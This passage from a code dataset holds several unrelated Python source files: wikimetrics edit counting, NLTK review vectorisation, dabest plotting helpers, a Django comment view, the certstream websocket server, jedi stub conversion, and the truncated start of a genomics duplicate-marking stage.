[Required()],\n default='0',\n description='0, 2, 4, etc.',\n )\n \n def __call__(self, user_ids, session):\n \"\"\"\n Parameters:\n user_ids : list of mediawiki user ids to find edit for\n session : sqlalchemy session open on a mediawiki database\n \n Returns:\n dictionary from user ids to the number of edit found.\n \"\"\"\n # directly construct dict from query results\n logger.debug('user_ids: %s, namespaces: %s', user_ids, self.namespaces)\n revisions_by_user = dict(\n session\n .query(Revision.rev_user, func.count(Revision.rev_id))\n .join(Page)\n .filter(Page.page_namespace.in_(self.namespaces.data))\n .filter(Revision.rev_user.in_(user_ids))\n .group_by(Revision.rev_user)\n .all()\n )\n return {user_id: revisions_by_user.get(user_id, 0) for user_id in user_ids}\n","sub_path":"wikimetrics/metrics/namespace_edits.py","file_name":"namespace_edits.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"310611783","text":"import json\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nimport csv\nimport nltk.sentiment.sentiment_analyzer\nfrom nltk.corpus import stopwords\nfrom string import punctuation\nfrom nltk.corpus import wordnet as wn\nfrom nltk.tag import pos_tag\nfrom itertools import chain\nimport re\nfrom numpy import *\nimport nltk.sentiment.sentiment_analyzer\n\ndef lemmatize_sentence(tokens):\n lemmatizer = WordNetLemmatizer()\n lemmatized_sentence = []\n for word, tag in pos_tag(tokens):\n if tag.startswith('NN'):\n pos = 'n'\n elif tag.startswith('VB'):\n pos = 'v'\n else:\n pos = 'a'\n lemmatized_sentence.append(lemmatizer.lemmatize(word, pos))\n return lemmatized_sentence\n\n#Function finds all synonyms from features. Returns dict with synonyms.\ndef syn():\n with open('Features_popular.txt', 'r', encoding = \"utf_8_sig\") as Features_popular:\n features_text = json.load(Features_popular)\n\n\n synonyms = {}\n lemmas = []\n for word in features_text:\n lemmas.clear()\n for syn in wn.synsets(word):\n for l in syn.lemmas():\n lemmas.append(l.name())\n synonyms.update({word: lemmas.copy()})\n return synonyms\n\n# def syno():\n# synonyms = []\n#\n# for syn in wn.synsets(\"chemical\"):\n# for l in syn.lemmas():\n# synonyms.append(l.name())\n# print(set(synonyms))\n#\n# for i, j in enumerate(wn.synsets('chemical')):\n# print(\"Hypernyms:\", \", \".join(list(chain(*[l.lemma_names() for l in j.hypernyms()]))))\n# print(\"Hyponyms:\", \", \".join(list(chain(*[l.lemma_names() for l in j.hyponyms()]))))\n# syno()\n#Function finds all hyponyms from features. Returns dict with hyponyms.\ndef hypo():\n with open('Features_popular.txt', 'r',encoding = \"utf_8_sig\") as Features_popular:\n features_text = json.load(Features_popular)\n\n Hyponyms = {}\n hyp = []\n for word in features_text:\n hyp.clear()\n for i, j in enumerate(wn.synsets(word)):\n if i < 1:\n x = list(chain(*[l.lemma_names() for l in j.hyponyms()]))\n hyp.append(x)\n Hyponyms.update({word: hyp.copy()})\n return Hyponyms\n\n#Function finds all hypernyms from features. Returns dict with hypernyms.\ndef hype():\n with open('Features_popular.txt', 'r', encoding = \"utf_8_sig\") as Features_popular:\n features_text = json.load(Features_popular)\n\n Hypernyms = {}\n hype = []\n for word in features_text:\n hype.clear()\n for i, j in enumerate(wn.synsets(word)):\n if i < 2:\n x = list(chain(*[l.lemma_names() for l in j.hypernyms()]))\n hype.append(x)\n Hypernyms.update({word: hype.copy()})\n return Hypernyms\n\n\ndef semantic_score(word1, word2):\n try:\n w1 = wn.synset(\"%s.n.01\" % (word1))\n w2 = wn.synset(\"%s.n.01\" % (word2))\n return wn.wup_similarity(w1, w2, simulate_root=False)\n except:\n return 0\n\n#Function makes tag, that defines negative context\ndef NegativeWord():\n with open('trunc.json', 'r', encoding = \"utf_8_sig\") as f:\n jsonData = json.load(f)\n\n tag_negative_words = list(copy(jsonData))\n for i in tag_negative_words:\n text = i[\"reviewText\"].split()\n analysis = nltk.sentiment.util.mark_negation(text)\n customStopWords = set(stopwords.words('english') + list(punctuation))\n WordsStopResult = [word for word in analysis if word not in customStopWords]\n lemmitazer_output = lemmatize_sentence(WordsStopResult)\n i.update({\"reviewText\": lemmitazer_output})\n del (i[\"label\"])\n\n # print(tag_negative_words)\n with open(\"Tag_nagative.txt\", \"w\", encoding = \"utf_8_sig\") as tag_negative:\n json.dump(tag_negative_words, tag_negative, indent=4)\n\n return tag_negative_words\n\n#Function transfers features into vector space. Output is vector consists of 0,1,-1.\ndef get_full_vector():\n with open('trunc.json', 'r', encoding = \"utf_8_sig\") as f:\n jsonData = json.load(f)\n\n corpus = []\n for i in jsonData:\n corpus.append(i[\"reviewText\"])\n print(corpus)\n\n # corpus_new = map(lambda x: x.lower(), corpus)\n # print(corpus_new)\n for i in range(len(corpus)):\n corpus[i] = corpus[i].lower()\n corpus[i] = re.sub(r'\\W', ' ', corpus[i])\n corpus[i] = re.sub(r'\\s+', ' ', corpus[i])\n print(corpus)\n # print(len(corpus))\n\n with open('Features_popular.txt', 'r', encoding = \"utf_8_sig\") as Features_popular:\n features_text = json.load(Features_popular)\n print(features_text)\n\n synonym = syn()\n sentence_vectors = []\n tag_neg = NegativeWord()\n for i in tag_neg:\n sentence_tokens = i[\"reviewText\"]\n # sentence_tokens = nltk.word_tokenize(sentence)\n sent_vec = {}\n sent_vec.update({\"overall\": i[\"overall\"]})\n for token in features_text:\n flag = False\n if token in sentence_tokens:\n if token + '_NEG' in sentence_tokens:\n sent_vec.update({token: -1})\n flag = True\n else:\n sent_vec.update({token: 1})\n flag = True\n else:\n for syno in synonym[token]:\n if syno in sentence_tokens:\n count = semantic_score(syno, sentence_tokens[sentence_tokens.index(syno)])\n if (count >= 0.5):\n sent_vec.update({token: 1})\n flag = True\n break\n else:\n if syno + \"_NEG\" in sentence_tokens:\n count = semantic_score(syno, sentence_tokens[sentence_tokens.index(syno + \"_NEG\")][:-4])\n if (count >= 0.5):\n sent_vec.update({token: -1})\n flag = True\n break\n if not flag:\n sent_vec.update({token: 0})\n for k,v in sent_vec.items():\n if (k==\"overall\") and (v<5):\n sentence_vectors.append(sent_vec)\n # print(sentence_vectors)\n # sentence_vectors = np.asarray(sentence_vectors)\n\n print(sentence_vectors)\n\n with open(\"Data_vector_reviews.csv\", \"w\", newline=\"\") as file:\n columns = sentence_vectors[0].keys()\n writer = csv.DictWriter(file, fieldnames=columns)\n writer.writeheader()\n # запись нескольких строк\n writer.writerows(sentence_vectors)\n\n return sentence_vectors\nget_full_vector()","sub_path":"Get_vector_features.py","file_name":"Get_vector_features.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"257673192","text":"\"\"\"\nA set of convenience functions used for producing plots in `dabest`.\n\nAuthor: Joses W. Ho\nEmail: joseshowh@gmail.com\nLicense: MIT\n\"\"\"\n\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n\nfrom .misc_tools import merge_two_dicts\n\n\ndef halfviolin(v, half = 'right', color = 'k'):\n for b in v['bodies']:\n mVertical = np.mean(b.get_paths()[0].vertices[:, 0])\n mHorizontal = np.mean(b.get_paths()[0].vertices[:, 1])\n vertices = b.get_paths()[0].vertices\n if half is 'left':\n b.get_paths()[0].vertices[:, 0] = np.clip(vertices[:, 0],\n -np.inf, mVertical)\n if half is 'right':\n b.get_paths()[0].vertices[:, 0] = np.clip(vertices[:, 0],\n mVertical, np.inf)\n if half is 'bottom':\n b.get_paths()[0].vertices[:, 1] = np.clip(vertices[:, 1],\n -np.inf, mHorizontal)\n if half is 'top':\n b.get_paths()[0].vertices[:, 1] = np.clip(vertices[:, 1],\n mHorizontal, np.inf)\n b.set_color(color)\n\ndef align_yaxis(ax1, v1, ax2, v2):\n \"\"\"adjust ax2 ylimit so that v2 in ax2 is aligned to v1 in ax1\"\"\"\n # Taken from\n # http://stackoverflow.com/questions/7630778/\n # matplotlib-align-origin-of-right-axis-with-specific-left-axis-value\n _, y1 = ax1.transData.transform((0, v1))\n _, y2 = ax2.transData.transform((0, v2))\n inv = ax2.transData.inverted()\n _, dy = inv.transform((0, 0)) - inv.transform((0, y1-y2))\n miny, maxy = ax2.get_ylim()\n ax2.set_ylim(miny+dy, maxy+dy)\n\ndef rotate_ticks(axes, angle=45, alignment='right'):\n for tick in axes.get_xticklabels():\n tick.set_rotation(angle)\n tick.set_horizontalalignment(alignment)\n\ndef tufte_summary_line(df, x, y, type='mean_sd',\n offset=0.3, ax=None, **kwargs):\n '''Convenience function to plot sumamry statistics (mean and standard\n deviation, or median and 25th & 75th percentiles) for ach group in the `x`\n column of `df`. This style is inspired by Edward Tufte.\n\n Keywords\n --------\n data: pandas DataFrame.\n This DataFrame should be in 'long' format.\n\n x, y: string.\n x and y columns to be plotted.\n\n type: {'mean_sd', 'median_quartiles'}, default 'mean_sd'\n Plots the summary statistics for each group. If 'mean_sd', then the\n mean and standard deviation of each group is plotted as a notched\n line beside each group. If 'median_quantile', then the\n median and 25th and 75th percentiles of each group is plotted\n instead.\n\n offset: float, default 0.4\n The x-offset of the summary line.\n\n offset: matplotlib Axes, default None\n If specified, the axes to plot on.\n\n kwargs: dict, default None\n Dictionary with kwargs passed to `matplotlib.patches.FancyArrow`.\n See docs at\n https://matplotlib.org/api/_as_gen/\n matplotlib.patches.FancyArrow.html#matplotlib.patches.FancyArrow\n\n '''\n import matplotlib.patches as mpatches\n\n if ax is None:\n ax = plt.gca()\n\n means = df.groupby(x)[y].mean()\n sd = df.groupby(x)[y].std()\n lower_sd = means - sd\n upper_sd = means + sd\n\n medians = df.groupby(x)[y].median()\n quantiles = df.groupby(x)[y].quantile([0.25, 0.75]).unstack()\n lower_quartiles = quantiles[0.25]\n upper_quartiles = quantiles[0.75]\n\n if type == 'mean_sd':\n central_measures = means\n low = lower_sd\n high = upper_sd\n elif type == 'median_quartiles':\n central_measures = medians\n low = lower_quartiles\n high = upper_quartiles\n\n total_width = 0.05 # the horizontal span of the line, aka `linewidth`.\n\n for k, m in enumerate(central_measures):\n\n kwargs['dx'] = 0\n kwargs['width'] = total_width\n kwargs['head_width'] = total_width\n kwargs['length_includes_head'] = True\n\n if type == 'mean_sd':\n dy_low = dy_high = sd[k]\n elif type == 'median_quartiles':\n dy_low = m - low[k]\n dy_high = high[k] - m\n\n arrow = mpatches.FancyArrow(x=offset+k, y=low[k],\n dy=dy_low,\n head_length=0.3*dy_low,\n **kwargs)\n ax.add_patch(arrow)\n\n arrow = mpatches.FancyArrow(x=offset+k, y=high[k],\n dy=-dy_high,\n head_length=0.3*dy_high,\n **kwargs)\n ax.add_patch(arrow)\n\ndef get_swarm_spans(coll):\n \"\"\"\n Given a matplotlib Collection, will obtain the x and y spans\n for the collection. Will return None if this fails.\n \"\"\"\n import numpy as np\n x, y = np.array(coll.get_offsets()).T\n try:\n return x.min(), x.max(), y.min(), y.max()\n except ValueError:\n return None\n\ndef gapped_lines(data, x, y,\n type='mean_sd',\n offset=0.3,\n ax=None,\n **kwargs):\n '''\n Convenience function to plot the standard devations as vertical\n errorbars. The mean is a gap defined by negative space.\n\n This style is inspired by Edward Tufte's redesign of the boxplot.\n See The Visual Display of Quantitative Information (1983), pp.128-130.\n\n Keywords\n --------\n data: pandas DataFrame.\n This DataFrame should be in 'long' format.\n\n x, y: string.\n x and y columns to be plotted.\n\n type: ['mean_sd', 'median_quartiles',], default 'mean_sd'\n Plots the summary statistics for each group. If 'mean_sd', then the\n mean and standard deviation of each group is plotted as a gapped line.\n If 'median_quantiles', then the median and 25th and 75th percentiles of\n each group is plotted instead.\n\n offset: float, default 0.3\n The x-offset of the mean-sd line.\n\n ax: matplotlib Axes object, default None\n If a matplotlib Axes object is specified, the gapped lines will be\n plotted in order on this axes. If None, the current axes (plt.gca())\n is used.\n\n kwargs: dict, default None\n Dictionary with kwargs passed to matplotlib.lines.Line2D\n '''\n import matplotlib.lines as mlines\n\n if ax is None:\n ax = plt.gca()\n\n keys = kwargs.keys()\n if 'zorder' not in keys:\n kwargs['zorder'] = 5\n\n if 'lw' not in keys:\n kwargs['lw'] = 2.\n\n if 'color' not in keys:\n kwargs['color'] = 'black'\n\n means = data.groupby(x)[y].mean()\n sd = data.groupby(x)[y].std()\n pooled_sd = sd.mean()\n lower_sd = means - sd\n upper_sd = means + sd\n\n medians = data.groupby(x)[y].median()\n quantiles = data.groupby(x)[y].quantile([0.25, 0.75]).unstack()\n lower_quartiles = quantiles[0.25]\n upper_quartiles = quantiles[0.75]\n\n if type == 'mean_sd':\n central_measures = means\n lows = lower_sd\n highs = upper_sd\n elif type == 'median_quartiles':\n central_measures = medians\n lows = lower_quartiles\n highs = upper_quartiles\n\n original_zorder = kwargs['zorder']\n span_color = kwargs['color']\n span_lw = kwargs['lw']\n for xpos, cm in enumerate(central_measures):\n # add vertical span line.\n kwargs['zorder'] = original_zorder\n kwargs['color'] = span_color\n kwargs['lw'] = span_lw\n low_to_high = mlines.Line2D([xpos+offset, xpos+offset],\n [lows[xpos], highs[xpos]],\n **kwargs)\n ax.add_line(low_to_high)\n\n # add horzontal central measure line.\n kwargs['zorder'] = 6\n kwargs['color'] = 'white'\n kwargs['lw'] = 2\n mean_line = mlines.Line2D([xpos+offset-0.01,\n xpos+offset+0.01],\n [cm, cm],\n **kwargs)\n ax.add_line(mean_line)\n","sub_path":"dabest/plot_tools.py","file_name":"plot_tools.py","file_ext":"py","file_size_in_byte":8134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"329765052","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render,get_object_or_404,redirect\nfrom .models import Comment,Post\nfrom member.models import User\nfrom django.http import HttpResponse\nfrom .forms import Commentform\n\n\ndef post_list(request):\n \n posts = Post.objects.all()\n comments = Comment.objects.all()\n context = {\n 'comments' :comments,\n 'posts' : posts,\n }\n\n return render(request,\"post.html\",context)\n\ndef createcomment(request , post_pk):\n if request.method =='POST':\n post = get_object_or_404(Post, pk=post_pk)\n content = request.POST.get('content')\n comment_form = Commentform(request.POST)\n\n if comment_form.is_valid():\n comment = comment_form.save(commit =False)\n comment.post = post\n comment.author = request.user\n comment.save()\n #post url 을 가진 post_list 뷰로 이동한다.\n return redirect('post:post_list')\n\ndef post_detail(request,post_pk):\n post = get_object_or_404(Post,pk=post_pk)\n comment_form = Commentform()\n context={\n 'post' : post,\n 'comment' : comment_form,\n }\n return render(request,'post_detail.html',context)\n","sub_path":"post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"75823632","text":"import asyncio\nimport collections\nimport json\nimport logging\nimport os\nimport time\n\nfrom aiohttp import web\nfrom aiohttp.web_urldispatcher import Response\n\nfrom certstream.util import pretty_date, get_ip\n\nWebsocketClientInfo = collections.namedtuple(\n 'WebsocketClientInfo',\n ['external_ip', 'queue', 'connection_time', 'channel']\n)\n\nSTATIC_INDEX = '''\n\n\n \n \n \n \n \n \n
\n \n\n'''.format(time.time())\n\nclass WebServer(object):\n def __init__(self, _loop, transparency_watcher):\n self.active_sockets = []\n self.valid_channels = [\n 'default',\n 'dns-only',\n 'leaf-only',\n ]\n self.recently_seen = collections.deque(maxlen=25)\n self.stats_url = os.getenv(\"STATS_URL\", 'stats')\n self.logger = logging.getLogger('certstream.webserver')\n\n self.loop = _loop\n self.watcher = transparency_watcher\n\n self.app = web.Application(loop=self.loop, middlewares=[self.redirect_ssl_if_needed,])\n\n self._add_routes()\n\n def run_server(self):\n self.mux_stream = asyncio.ensure_future(self.mux_ctl_stream())\n self.heartbeat_coro = asyncio.ensure_future(self.ws_heartbeats())\n web.run_app(\n self.app,\n port=int(os.environ.get('PORT', 8080)),\n loop=self.loop,\n )\n\n def _add_routes(self):\n self.app.router.add_get(\"/latest.json\", self.latest_json_handler)\n self.app.router.add_get(\"/example.json\", self.example_json_handler)\n self.app.router.add_get(\"/{}\".format(self.stats_url), self.stats_handler)\n self.app.router.add_get('/', self.root_handler)\n self.app.router.add_get('/develop', self.dev_handler)\n\n async def redirect_ssl_if_needed(self, _, handler):\n async def middleware_handler(request):\n if os.environ.get('NOSSL') == None and not request.host.startswith('127.0.0.1') and request.headers.get('X-Forwarded-Proto', 'http') == 'http':\n return web.HTTPFound(request.url.with_scheme('https'))\n response = await handler(request)\n return response\n return middleware_handler\n\n async def mux_ctl_stream(self):\n while True:\n cert_data = await self.watcher.stream.get()\n\n data_packet = {\n \"message_type\": \"certificate_update\",\n \"data\": cert_data\n }\n\n self.recently_seen.append(data_packet)\n\n for client in self.active_sockets:\n await client.queue.put(data_packet)\n\n async def dev_handler(self, request):\n # If we have a websocket request\n if request.headers.get(\"Upgrade\"):\n ws = web.WebSocketResponse()\n\n await ws.prepare(request)\n\n try:\n for message in self.recently_seen:\n message_json = json.dumps(message)\n await ws.send_str(message_json)\n except asyncio.CancelledError:\n print('websocket cancelled')\n\n await ws.close()\n\n return ws\n\n return web.Response(\n body=json.dumps(\n {\n \"error\": \"Please use this url with a websocket client!\"\n },\n indent=4\n ),\n content_type=\"application/json\",\n )\n\n async def root_handler(self, request, filename=None):\n # If we have a websocket request\n if request.headers.get(\"Upgrade\"):\n requested_channel = request.GET.get('channel', 'default')\n\n if requested_channel not in self.valid_channels:\n raise web.HTTPBadRequest(text=\"Invalid channel!\")\n\n ws = web.WebSocketResponse()\n\n await ws.prepare(request)\n\n client_queue = asyncio.Queue()\n\n websocket_info = WebsocketClientInfo(\n external_ip=get_ip(request),\n queue=client_queue,\n connection_time=int(time.time()),\n channel=requested_channel\n )\n\n self.active_sockets.append(websocket_info)\n\n try:\n while True:\n message = await client_queue.get()\n message_json = json.dumps(message)\n await ws.send_str(message_json)\n except asyncio.CancelledError:\n print('websocket cancelled')\n finally:\n self.active_sockets.remove(websocket_info)\n\n await ws.close()\n\n return ws\n else:\n return Response(body=STATIC_INDEX, content_type=\"text/html\")\n\n async def latest_json_handler(self, _):\n return web.Response(\n body=json.dumps(\n {\n \"messages\": list(self.recently_seen)\n },\n indent=4\n ),\n headers={\"Access-Control-Allow-Origin\": \"*\"},\n content_type=\"application/json\",\n )\n\n async def example_json_handler(self, _):\n if self.recently_seen:\n return web.Response(\n body=json.dumps(list(self.recently_seen)[0], indent=4),\n headers={\"Access-Control-Allow-Origin\": \"*\"},\n content_type=\"application/json\",\n )\n else:\n return web.Response(\n body=\"{}\",\n headers={\"Access-Control-Allow-Origin\": \"*\"},\n content_type=\"application/json\"\n )\n\n async def stats_handler(self, _):\n clients = {}\n for client in self.active_sockets:\n client_identifier = \"{}-{}\".format(client.external_ip, client.connection_time)\n clients[client_identifier] = {\n \"ip_address\": client.external_ip,\n \"conection_time\": client.connection_time,\n \"connection_length\": pretty_date(client.connection_time),\n \"channel\": client.channel\n }\n\n return web.Response(\n body=json.dumps({\n \"connected_client_count\": len(self.active_sockets),\n \"clients\": clients\n }, indent=4\n ),\n content_type=\"application/json\",\n )\n\n async def ws_heartbeats(self):\n self.logger.info(\"Starting WS heartbeat coro...\")\n while True:\n await asyncio.sleep(10)\n self.logger.debug(\"Sending ping...\")\n timestamp = time.time()\n for client in self.active_sockets:\n await client.queue.put({\n \"message_type\": \"heartbeat\",\n \"timestamp\": timestamp\n })\n\nif __name__ == \"__main__\":\n from certstream.watcher import TransparencyWatcher\n loop = asyncio.get_event_loop()\n watcher = TransparencyWatcher(loop)\n webserver = WebServer(loop, watcher)\n asyncio.ensure_future(asyncio.gather(*watcher.get_tasks()))\n webserver.run_server()\n","sub_path":"certstream/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":7286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"215735316","text":"from jedi import debug\nfrom jedi.evaluate.base_context import ContextSet, \\\n NO_CONTEXTS\nfrom jedi.evaluate.utils import to_list\nfrom jedi.evaluate.gradual.stub_context import StubModuleContext\n\n\ndef stub_to_actual_context_set(stub_context, ignore_compiled=False):\n stub_module = stub_context.get_root_context()\n if not stub_module.is_stub():\n return ContextSet([stub_context])\n\n was_instance = stub_context.is_instance()\n if was_instance:\n stub_context = stub_context.py__class__()\n\n qualified_names = stub_context.get_qualified_names()\n if qualified_names is None:\n return NO_CONTEXTS\n\n was_bound_method = stub_context.is_bound_method()\n if was_bound_method:\n # Infer the object first. We can infer the method later.\n method_name = qualified_names[-1]\n qualified_names = qualified_names[:-1]\n was_instance = True\n\n contexts = _infer_from_stub(stub_module, qualified_names, ignore_compiled)\n if was_instance:\n contexts = ContextSet.from_sets(\n c.execute_evaluated()\n for c in contexts\n if c.is_class()\n )\n if was_bound_method:\n # Now that the instance has been properly created, we can simply get\n # the method.\n contexts = contexts.py__getattribute__(method_name)\n return contexts\n\n\ndef _infer_from_stub(stub_module, qualified_names, ignore_compiled):\n assert isinstance(stub_module, StubModuleContext), stub_module\n non_stubs = stub_module.non_stub_context_set\n if ignore_compiled:\n non_stubs = non_stubs.filter(lambda c: not c.is_compiled())\n for name in qualified_names:\n non_stubs = non_stubs.py__getattribute__(name)\n return non_stubs\n\n\ndef try_stubs_to_actual_context_set(stub_contexts, prefer_stub_to_compiled=False):\n contexts = ContextSet.from_sets(\n stub_to_actual_context_set(stub_context, ignore_compiled=prefer_stub_to_compiled)\n or ContextSet([stub_context])\n for stub_context in stub_contexts\n )\n debug.dbg('Stubs to actual: %s to %s', stub_contexts, contexts)\n return contexts\n\n\n@to_list\ndef try_stub_to_actual_names(names, prefer_stub_to_compiled=False):\n for name in names:\n module = name.get_root_context()\n if not module.is_stub():\n yield name\n continue\n\n name_list = name.get_qualified_names()\n if name_list is None:\n contexts = NO_CONTEXTS\n else:\n contexts = _infer_from_stub(\n module,\n name_list[:-1],\n ignore_compiled=prefer_stub_to_compiled,\n )\n if contexts and name_list:\n new_names = contexts.py__getattribute__(name_list[-1], is_goto=True)\n for new_name in new_names:\n yield new_name\n if new_names:\n continue\n elif contexts:\n for c in contexts:\n yield c.name\n continue\n # This is the part where if we haven't found anything, just return the\n # stub name.\n yield name\n\n\ndef _load_stub_module(module):\n if module.is_stub():\n return module\n from jedi.evaluate.gradual.typeshed import _try_to_load_stub_cached\n return _try_to_load_stub_cached(\n module.evaluator,\n import_names=module.string_names,\n actual_context_set=ContextSet([module]),\n parent_module_context=None,\n sys_path=module.evaluator.get_sys_path(),\n )\n\n\ndef name_to_stub(name):\n return ContextSet.from_sets(to_stub(c) for c in name.infer())\n\n\ndef to_stub(context):\n if context.is_stub():\n return ContextSet([context])\n\n was_instance = context.is_instance()\n if was_instance:\n context = context.py__class__()\n\n qualified_names = context.get_qualified_names()\n stub_module = _load_stub_module(context.get_root_context())\n if stub_module is None or qualified_names is None:\n return NO_CONTEXTS\n\n was_bound_method = context.is_bound_method()\n if was_bound_method:\n # Infer the object first. We can infer the method later.\n method_name = qualified_names[-1]\n qualified_names = qualified_names[:-1]\n was_instance = True\n\n stub_contexts = ContextSet([stub_module])\n for name in qualified_names:\n stub_contexts = stub_contexts.py__getattribute__(name)\n\n if was_instance:\n stub_contexts = ContextSet.from_sets(\n c.execute_evaluated()\n for c in stub_contexts\n if c.is_class()\n )\n if was_bound_method:\n # Now that the instance has been properly created, we can simply get\n # the method.\n stub_contexts = stub_contexts.py__getattribute__(method_name)\n return stub_contexts\n","sub_path":"jedi/evaluate/gradual/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"104932602","text":"\"\"\"\nCopyright (c) 2019 10x Genomics, Inc. All rights reserved.\n\nMark PCR duplicates in a BAM file\n\"\"\"\nfrom __future__ import division\n\nimport itertools\nimport json\nimport math\nimport os\nimport numpy as np\nimport martian\nimport pickle\nimport pysam\nimport tenkit.bam as tk_bam\nimport tenkit.lane as tk_lane\nfrom barcodes import get_read_barcode, load_barcode_whitelist, whitelist_mem_gb\nfrom tools import ReferenceManager, create_bam_infile\nfrom tools.io import index_bam, hierarchical_merge_bam, sort_bam, sort_bed, merge_keyed_bed\nfrom tools.peaks import adjusted_position_pairs, is_chimeric_fragment\nfrom collections import namedtuple, Counter\nfrom constants import (SELF_FIVE_PRIME_POS_TAG, MATE_FIVE_PRIME_POS_TAG, LOW_MAPQ_THRESHOLD,\n MATE_MAPPING_QUALITY_TAG, NO_BARCODE, TENX_PRODUCT_NAME)\n\n__MRO__ = \"\"\"\nstage MARK_DUPLICATES(\n in bam input,\n in string reference_path,\n in json raw_barcode_counts,\n in string barcode_whitelist,\n out bam output,\n out bam.bai index,\n out csv singlecell_mapping,\n out tsv.gz fragments,\n out tsv.gz.tbi fragments_index,\n src py \"stages/processing/mark_duplicates\",\n) split (\n in map lane_map,\n in string chunk_start,\n in string chunk_end,\n in int chunk_num,\n)\n\"\"\"\n\n# For optical duplicate detection\nOPTICAL_DUPLICATE_DISTANCE = 100\n\n# For diffusion duplicate detection, max distance over which diffusion is expected\nMAX_DIFFUSION_DUP_DISTANCE = 25e3\n\nSINGLE_CELL_KEYS = [\"total\", \"duplicate\", \"chimeric\", \"unmapped\",\n \"lowmapq\", \"mitochondrial\", \"passed_filters\"]\n\nReadFootprint = namedtuple(\"ReadFootprint\", [\"barcode\", \"ref_id\", \"position\", \"mate_ref_id\", \"mate_position\"])\nNamedRead = namedtuple(\"NamedRead\", [\"footprint\", \"barcode\", \"read\"])\n\n\n# Generator utilities -- move to tenkit?\ndef consumer(func):\n \"\"\" decorator for initializing a generator consumer function \"\"\"\n\n def start(*args, **kwargs):\n c = func(*args, **kwargs)\n c.next()\n return c\n\n return start\n\n\ndef broadcast(source, consumers):\n \"\"\" send each item in the source generator to each consumer in the list \"\"\"\n for item in source:\n for c in consumers:\n c.send(item)\n\n for c in consumers:\n c.close()\n\n\ndef chunk_bound_func(read):\n if not read.is_unmapped:\n return read.reference_id, read.get_tag(SELF_FIVE_PRIME_POS_TAG)\n else:\n return None\n\n\nclass DupSummary:\n def __init__(self, split_bcs, lane_coordinate_system, output_bam, output_tsv,\n ref, bam_refs, priors=None, write_to_stdout=False):\n \"\"\" Summarize dups at a given subsampling rate, and barcode\n splitting policy. If an open output_bam pysam.Samfile\n is passed, dups will be marked and reads will be written\n to output_bam \"\"\"\n self.split_bcs = split_bcs\n if output_bam is None or output_tsv is None:\n raise ValueError(\"Must provide valid output paths\")\n\n self.output_bam = output_bam\n self.output_tsv = output_tsv\n self.primary_contigs = ref.primary_contigs(allow_sex_chromosomes=True)\n self.mito_contigs = ref.non_nuclear_contigs()\n self.contig_lookup = bam_refs\n self.write_to_stdout = write_to_stdout\n self.bc_counts = {}\n self.contig_lengths = ref.get_contig_lengths()\n\n self.lane_coordinate_system = lane_coordinate_system\n\n # This is the raw counts of reads per barcode, used to discriminate when assigning a dupgroup to a barcode\n self.priors = priors\n\n def count_dups_by_distance(self, namedreads):\n \"\"\"Count number of nearby duplicates in a set of reads. A pair is counted as 1\"\"\"\n # Get (flowcell, lane, surface, swath, tile, x, y) tuples for each read\n read_locs = []\n for (footprint, barcode, read) in namedreads:\n read_loc = tk_lane.extract_read_position(read)\n if read_loc is not None:\n read_locs.append((read_loc, read))\n\n # Sort by flowcell_lane\n def flowcell_lane(read_loc):\n return \"%s_%s\" % (read_loc[0].flowcell, read_loc[0].lane)\n\n read_locs.sort(key=flowcell_lane)\n lane_groups = itertools.groupby(read_locs, flowcell_lane)\n\n opt_dups_found = 0 # really close dupes\n diff_dups_found = 0 # somewhat close dupes\n\n # Measure distances between all pairs in a lane\n for (lane, lane_reads) in lane_groups:\n lane_reads = list(lane_reads)\n\n layout = self.lane_coordinate_system.get_layout_for_read_loc(lane_reads[0][0])\n test_dups = layout.has_diffusion_duplicates(MAX_DIFFUSION_DUP_DISTANCE)\n\n if len(lane_reads) > 100:\n martian.log_info(\"Got dup cluster of size: %d\" % len(lane_reads))\n first_read = lane_reads[0][1]\n martian.log_info(\"tid: %d, pos: %d, mapq: %d, seq: %s\" % (\n first_read.reference_id, first_read.reference_start, first_read.mapping_quality,\n first_read.query_sequence))\n\n opt_dups = set()\n diff_dups = set()\n dump = []\n cmp_reads = min(200, len(lane_reads))\n lane_loc_coords = [self.lane_coordinate_system.convert_to_lane_coords(loc) for (loc, _) in lane_reads]\n for i in range(cmp_reads):\n loc1, read1 = lane_reads[i]\n lane_loc1 = lane_loc_coords[i]\n\n for j in range(i + 1, len(lane_reads)):\n loc2, read2 = lane_reads[j]\n lane_loc2 = lane_loc_coords[j]\n\n dist = math.sqrt((lane_loc1[0] - lane_loc2[0]) ** 2 + (lane_loc1[1] - lane_loc2[1]) ** 2)\n if test_dups and dist < MAX_DIFFUSION_DUP_DISTANCE:\n diff_dups.add(j)\n if self.write_to_stdout and j not in diff_dups:\n dump.append((\"%d\\t\" + (\"%d\\t\" * 14)) % (dist,\n loc1.surface, loc1.swath, loc1.tile, loc1.x, loc1.y,\n lane_loc1[0], lane_loc1[1],\n loc2.surface, loc2.swath, loc2.tile, loc2.x, loc2.y,\n lane_loc2[0], lane_loc2[1]))\n\n if dist < OPTICAL_DUPLICATE_DISTANCE:\n opt_dups.add(j)\n\n if self.write_to_stdout and len(diff_dups) >= 2:\n for x in dump:\n print (\"%d\\t%s\" % (len(diff_dups), x))\n\n diff_dups_found += len(diff_dups)\n opt_dups_found += len(opt_dups)\n\n return opt_dups_found, diff_dups_found\n\n def process_read_block(self, reads):\n \"\"\"dedups a block of reads, then writes them to output BAM in original order \"\"\"\n read_tuples = []\n for read in reads:\n barcode = get_read_barcode(read)\n if barcode not in self.bc_counts:\n self.bc_counts[barcode] = {key: 0 for key in SINGLE_CELL_KEYS}\n\n if 